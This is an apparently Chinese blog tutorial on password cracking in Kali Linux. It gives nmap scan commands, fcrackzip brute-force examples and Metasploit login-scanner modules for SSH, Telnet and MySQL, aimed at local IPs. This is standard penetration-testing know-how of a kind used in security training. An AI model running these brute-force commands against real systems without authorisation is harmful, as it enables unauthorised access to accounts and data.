破解密码(kali环境下)的各种方法

术语

名词语义
暴力破解通过已知密码字典分别进行尝试
字典账号密码集合.txt
掩码破解猜测的方式破解。类似正则匹配账号密码,对计算机的要求较高

常见默认端口

端口程序
21FTP 端口
22SSH SFTP 端口
3306mysql 默认端口
3389Windwos 远程登录端口
5800VNC 端口相当于Windows的远程登录
6379redis 默认端口
27024MongoDB 默认端口

端口扫描

利用 nmap 扫描

#仅扫描主机
nmap -sP 192.168.1.0/24    #进行ping扫描,打印出对扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测)

#扫描主机和端口
nmap -sS 192.168.1.0/24    #使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快:(显示mac ip port protocol)
nmap -sT 192.168.1.0/24    #当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描:

#探测目标主机的操作系统
nmap -O 192.168.1.19   #显示mac ip port protocol 操作系统(仅猜测)
nmap -A 192.168.1.19   #显示mac ip port(更详细) protocol 操作系统(仅猜测)
nmap -sO 192.168.1.19    #确定目标机支持哪些协议 (TCP,ICMP,IGMP等)

#详细输出-v
nmap -v

破解方法

压缩文件暴力破解

使用fcrackzip破解zip压缩包

这是一款kali下字段的破解zip压缩包的工具。

破解ZIP加密文件 使用如下:

fcrackzip -b -l 6-6 -c 1 -p 000000 passwd.zip
  • -b 暴力破解
  • -c 1 限制密码是数字
  • -l 6-6 限制密码长度为6
  • -p 000000 初始化破解起点

使用字典破解:

fcrackzip -D -p passwd passwd.zip
  • -D -p passwd 密码本passwd文件
当然还有很多的方法可以暴力破解压缩包

破解 ssh

我们可以利用 nmap msfconsole 等工具里面字典的模块进行破解。这里 以 msfconsole为例:
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /root/zi.txt
set RHOSTS 192.168.123.1
set USERNAME admin
run

telnet 破解

Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。

先扫描端口上是否开启

nmap -T4 -A 192.168.123.1 -p 23

利用 msfconsole 中的相应模块进行破解

use auxiliary/scanner/telnet/telnet_login

mysql破解

MySQL是一个关系型数据库管理系统,MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS 应用软件之一。

使用模块

use auxiliary/scanner/mysql/mysql_login

数据库 dede 的密码为 123456

其他神器

当然,我们利用其他的密码破解工具也是可以
  • hashcat
  • john
  • medusa
Last modification:November 5, 2020
如果觉得我的文章对你有用,请随意赞赏